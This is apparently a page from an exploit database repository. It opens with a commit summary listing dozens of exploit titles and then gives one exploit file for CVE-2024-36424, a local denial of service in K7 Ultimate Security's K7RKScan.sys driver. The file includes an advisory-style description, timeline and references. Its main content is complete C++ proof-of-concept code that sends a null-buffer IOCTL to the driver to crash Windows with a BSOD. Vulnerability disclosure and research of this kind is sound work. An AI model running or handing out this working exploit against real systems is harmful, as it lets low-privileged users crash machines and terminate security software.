
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
92 lines
No EOL
3.3 KiB
Python
Executable file
92 lines
No EOL
3.3 KiB
Python
Executable file
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
|
|
# Date: 13.08.2024
|
|
# Author: M. Akil Gündoğan
|
|
# Vendor Homepage: https://k7computing.com/
|
|
# Version: < v17.0.2019
|
|
# Tested on: Windows 10 Pro x64
|
|
# CVE ID: CVE-2024-36424
|
|
|
|
# Vulnerability Description:
|
|
--------------------------------------
|
|
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
|
|
|
|
# Technical details and step by step Proof of Concept's (PoC):
|
|
--------------------------------------
|
|
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
|
|
|
|
2 - Compile the attached PoC code written in C++ as release on VS 2022.
|
|
|
|
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
|
|
|
|
# Impact:
|
|
--------------------------------------
|
|
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
|
|
|
|
# Advisories:
|
|
--------------------------------------
|
|
K7 Computing recommends that all customers update their products to the corresponding versions shown below:
|
|
|
|
K7 Ultimate Security (17.0.2019 or Higher)
|
|
|
|
# Timeline:
|
|
--------------------------------------
|
|
- 16.05.2024 - Vulnerability reported.
|
|
- 05.08.2024 - Vendor has fixed the vulnerability.
|
|
- 13.08.2024 - Released.
|
|
|
|
# References:
|
|
--------------------------------------
|
|
- Vendor: https://www.k7computing.com
|
|
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
|
|
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
|
|
- Repository: https://github.com/secunnix/CVE-2024-36424
|
|
|
|
# PoC Code (C++):
|
|
-------------------------------------------------------------------------------------------------------------------------
|
|
|
|
/*
|
|
# Usage: Only compile it and run, boooom :)
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <iostream>
|
|
|
|
const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
|
|
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014
|
|
|
|
int main() {
|
|
std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
|
|
HANDLE hDevice = CreateFile(driverDevice.c_str(),
|
|
GENERIC_READ | GENERIC_WRITE,
|
|
0,
|
|
nullptr,
|
|
OPEN_EXISTING,
|
|
0,
|
|
nullptr);
|
|
|
|
if (hDevice == INVALID_HANDLE_VALUE) {
|
|
std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
|
|
return 1;
|
|
}
|
|
|
|
void* inputBuffer = nullptr; // Null input buffer
|
|
DWORD inputBufferSize = 0;
|
|
|
|
DWORD bytesReturned;
|
|
BOOL result = DeviceIoControl(hDevice,
|
|
ioCTL,
|
|
inputBuffer,
|
|
inputBufferSize,
|
|
nullptr,
|
|
0,
|
|
&bytesReturned,
|
|
nullptr);
|
|
|
|
if (!result) {
|
|
std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
|
|
}
|
|
|
|
CloseHandle(hDevice);
|
|
|
|
return 0;
|
|
} |